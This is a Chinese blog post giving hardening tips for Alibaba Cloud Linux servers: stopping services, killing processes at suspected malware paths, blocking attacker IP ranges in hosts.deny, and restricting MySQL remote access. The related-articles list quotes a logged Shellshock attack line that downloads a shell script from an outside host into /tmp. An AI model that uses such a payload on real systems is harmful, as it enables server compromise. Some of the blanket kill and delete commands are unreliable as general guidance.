阿里云主机防止攻击的建议

最新推荐文章于 2020-10-13 14:57:52 发布
最新推荐文章于 2020-10-13 14:57:52 发布
阅读量270 收藏
点赞数
分类专栏: linux命令 文章标签: 防止攻击 防止肉鸡

阿里云主机防止攻击的建议

(1)关闭不必要的服务

[root@iZ25tti3rxdZ tmp]# chkconfig gshelld --level 35 off

[root@iZ25tti3rxdZ tmp]# service gshelld stop

Stopping gshelld ...

[root@iZ25tti3rxdZ tmp]# ^C

[root@iZ25tti3rxdZ tmp]# chkconfig nscd --level 35 off

[root@iZ25tti3rxdZ tmp]# service nscd stop

Stopping nscd:                                             [FAILED]

[root@iZ25tti3rxdZ tmp]# chkconfig ntpd --level 35 off

[root@iZ25tti3rxdZ tmp]# service ntpd stop

Shutting down ntpd:                                        [  OK  ]

[root@iZ25tti3rxdZ tmp]# chkconfig udev-post --level 35 off

[root@iZ25tti3rxdZ tmp]# service udev-post stop

 

 

(2)定时杀死可疑进程

ps -ef |grep "/usr/bin/acpid" |grep -v grep |awk -F" "  {'print $2'}|xargs -i kill -9 {}
ps -ef |grep "/usr/bin/bsd-port/agent" |grep -v grep |awk -F" "  {'print $2'}|xargs -i kill -9 {}
ps -ef |grep "/usr/bin/.sshd" |grep -v grep|awk -F" "  {'print $2'}|xargs -i kill -9 {}
ps -ef |grep "/root/.l" |grep -v grep|awk -F" "  {'print $2'}|xargs -i kill -9 {}
ps -ef |grep "/mnt/linsx" |grep -v grep|awk -F" "  {'print $2'}|xargs -i kill -9 {}
ps -ef |grep "getty" |grep -v grep|awk -F" "  {'print $2'}|xargs -i kill -9 {}
find /mnt/ -type f |xargs chmod a-x
find /tmp/ -type f |xargs chmod a-x

 

 

(3)定期修改root 密码

 

(4)把经常登录失败的ip放到hosts.deny中

/etc/hosts.deny :

sshd:121.42.0.
sshd:121.15.151.
#sshd:223.104.38.177
#sshd:117.136.38.
sshd:203.201.161.
sshd:201.172.242.
sshd:189.219.166.
sshd:201.175.123.
sshd:201.172.78.
sshd:201.173.37.
sshd:201.172.104.
sshd:101.205.43.
sshd:189.218.77.
sshd:200.239.61.
sshd:37.229.68.
sshd:187.160.49.
sshd:189.219.81.
sshd:107.191.207.
sshd:50.180.102.
sshd:99.194.146.
sshd:201.173.168.
sshd:189.218.200.
sshd:201.172.120.

 

(5)尽量不要允许mysql的远程访问

mysql> delete from user where host='%';
Query OK, 2 rows affected (0.02 sec)
flush privileges;

(6) 根目录和/tmp目录下的文件一定不要可执行权限(x)

 

参考:

http://loutsx.blog.163.com/blog/static/1619920872014554326635/

 

 

调皮的芋头
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
阿里云服务器搭建代码文档
03-26
### 阿里云服务器搭建代码文档知识点梳理 #### 一、阿里云服务器ECS建站教程概述 - **文档目的**:旨在为用户提供阿里云ECS(Elastic Compute Service,弹性计算服务)上的网站搭建指导,帮助用户快速掌握如何在...
shell编程(4)---Bash变量
dingxingmei的专栏
07-02 230
shell 和 bash 是一个意思。 1 bash 变量的概述 shell 是脚本语言 ,不需要提前编译,在执行的过程中编译,所见即所得。 php ,java主要用来实现功能,语言函数等多且复杂 shell 是用来简化系统管理操作 ,例如 添加一万个用户,如果采用useradd 手工添加太........,可以采用...
如何做好网站安全防护,防止被黑客攻击
weixin_33969116的博客
09-26 968
一、为什么黑客会攻击我? 从最近我收到的很多站长反馈以及我主动去了解的情况来看,相当一部分站长对于自己网站被黑表示非常的不理解,觉得自己的网站不大,弄得又不怎么的,怎么就被黑客盯上了,并挂上了黑链。然后开始怀疑自己是不是表现得太高调了,是不是长得太帅了遭到妒忌了等等。 首先,我非常肯定的告诉大家,黑客攻击绝对不会因为你长得太帅了。从目前的趋势来看,...
阿里云ECS后台利用“安全组”屏蔽恶意攻击ip地址
刘亚伟
12-27 1万+
阿里云后台的云盾监控—》威胁—》攻击,会发现每天有大量的恶意攻击,存在大量GET请求,导致服务器资源浪费无用消耗。 20160220102620 最近7天攻击类型 仔细查看攻击来源的信息,发现99%以上的攻击ip地址,都存在历史攻击记录,如下图: 攻击者详情 攻击者详情 我感觉阿里云完全有能力判断和屏蔽攻击者IP地址,保护客户的利益(ps:利用历史攻击次数判断是否屏蔽IP),但阿里云没有这么做。...
一次诡异的磁盘空间占用问题排查
xindoo
09-13 5200
大半夜接到线上一服务器磁盘占用率超过90%的短信,需要立即处理。一般这种情况都是线上异常,当天日志打太多,无法自动删掉的。上来第一反应就是查我们规范java应用日志目录,居然没有文件,再查,居然连java进程都没有,原来不是java应用,不过没关系,干一年运维也不是白干的,还是有其他方法可以查的,在此记录下整个排查过程。
阿里云标准-MySQL安全基线检查文档
05-10
### 阿里云标准-MySQL安全基线检查知识点详解 #### 一、避免使用通配符主机名进行身份鉴别 **重要性**: 使用通配符(如`%`)来标识用户允许连接的主机范围可能导致数据库服务对外开放,增加了安全风险。 **检查...
阿里云 专有云企业版 V3.8.1 云数据库 OceanBase 安全白皮书 20190910
04-08
"阿里云专有云企业版V3.8.1云数据库OceanBase安全白皮书20190910" 本文档主要介绍了阿里云专有云企业版V3.8.1云数据库OceanBase的安全白皮书,旨在帮助用户了解OceanBase的安全设计和实现方案。下面是本文档的详细...
阿里云服务器安全-产品简介.pdf
10-11
阿里云服务器安全,也称为“安骑士”,是一款由云盾推出的服务器安全运维管理产品,旨在保障用户云服务器的安全。该产品通过在服务器上安装轻量级的Agent插件,与云端防护中心的规则联动,实现实时监控和防御入侵...
阿里云服务器cpu连续n天使用率为100%问题解决方案!
sidongxue2的专栏
06-16 2万+
硬件配置: 阿里云服务器(CPU:4核 内存:4GB 数据盘:450G 带宽:5Mbps). 系统配置: iluckysi@ILUCKYSI-PC:/etc# cat issue Ubuntu 12.04.5 LTS \n \l 异常信息: cpu连续n天使用率为100%. 查找原因: 查看系统cpu和memory使用情况. iluckysi@ILUCKYSI-PC:/e
阿里云服务器被挖矿程序minerd入侵的终极解决办法
热门推荐
Java高知社区
01-06 4万+
突然发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了200%多的CPU, 百度了一下,查到几篇文章都有人遇到同样问题,解决的办法:http://blog.csdn.net/hu_wen/article/details/51908597 但我去查看启动的服务,尽然没有 lady 这个服务。 找不到根源,那个minerd进程删掉就又起来了,后来想了个临时办法,先停掉
阿里云ECS被攻击
weixin_33726318的博客
12-28 1161
今天发现阿里云ECS被攻击了,记录一下, /1.1 Match1:{ :;};/usr/bin/perl -e 'print .content-type: text/plain.r.n.r.nxsuccess!.;system(.wget http://lbinvestment.com/shell.txt -o /tmp/shell.txt;curl -o /tmp/shell.txt http...
关于数据安全保护的声明
weixin_33810302的博客
05-31 450
阿里云一直将保护客户数据隐私和数据安全视作生命线。未经客户授权,阿里云绝不会擅自查看客户敏感数据,包括但不限于端口流量,私钥、PKI关键密文等。 今天有客户反映,使用阿里云服务器部署爬虫业务时发现网络连接不稳定的现象,怀疑可能是gshelld、aliyun-service、Aegis、Snort四个程序导致的。 我们在此郑重声明:阿里云的所有程序不会查看...
云服务器这么安全,是怎么避免网络攻击
weixin_44019817的博客
12-25 1297
随着云计算的发展和使用,云服务器现在使用的也是越来越广泛。云服务器是对传统互联网托管平台的延伸和发,具备高灵活性、高稳定性、高可用性等特点。但是在使用时,和其他托管平台,云服务器同样不可避免地要面临被恶意网络攻击的风险,因此做好云服务器恶意攻击的防范工作非常重要且必要。那么云服务器如何避免网络攻击呢? 当企业开始迁移到公有云时,网络攻击事件的发生的可能性就让人不寒而栗。在公有云中,企业将数据放在...
记一次阿里云被DDOS/CC攻击解决过程
云加速
10-13 2736
这是主机吧一位客户之前遇到DDOS攻击完美解决并写下的过程,主机吧转载下希望可以帮助大家。 早上9点左右收到阿里云信息,大概已经就是服务器DDOS攻击超过基础防御了,IP将被封禁。 ping了下IP,果然ping不通过了。根本短信提示进入云盾查看,果然是被DDOS攻击了,峰值高达24.55GB 对于一个网站业务来说20多G的峰值是相当大的了,直接买阿里云高防IP吗?查了下阿里云高防IP价格,价格吓人,20800元一个月! 想了下还是购买别的服务商进行防御吧,转了一圈,发现高防IP都很贵,30
阿里云Linux新手入门一
huangtao117的专栏
07-27 1万+
阿里云Linux系统新手入门(一)
数据结构试题参考及答案.doc
08-29
内容概要:本资源提供了一份详尽的数据结构试题参考及答案,覆盖了从基础概念到复杂算法的多个层面。读者可以通过这份材料,系统地学习和复习数据结构的理论知识和应用实践,包括但不限于时间复杂度分析、线性表操作、树与图的遍历、排序算法等。 适合人群:适合计算机科学与技术专业的学生、准备数据结构考试或面试的研发人员,以及任何希望提升数据结构和算法知识的编程爱好者。 能学到什么: 1. 如何分析和计算算法的时间复杂度,掌握不同算法性能评估的方法。 2. 线性表的存储结构,包括顺序表和链表的特点及其操作实现。 3. 图和树的遍历算法,理解深度优先搜索和广度优先搜索的应用场景。 4. 排序算法的原理和实现,包括快速排序、归并排序等。 5. 哈希表的设计与冲突解决策略,理解哈希函数的重要性。 6. 递归算法和非递归算法的设计思想,学习如何选择合适的算法实现。 阅读建议:此资源不仅包含了数据结构的基础知识点,还提供了丰富的例题和解答,适合读者进行自我测试和深化理解。在学习过程中,建议结合实际编程实践,将理论知识应用到具体的算法实现中。同时,鼓励读者在理解的基础上,自行推导和验证答案,以加深记忆和理解。
有住网(装修小程序源码).zip
最新发布
08-29
有住网(装修小程序源码).zip
阿里云安全架构详解:从物理到云产品
4. **虚拟化安全**:阿里云采用安全的虚拟化技术,通过隔离机制和安全策略,确保不同租户之间的资源安全,防止虚拟机逃逸和跨虚拟机攻击。 5. **云产品安全**:每个阿里云产品都内置了多层安全防护,例如云服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值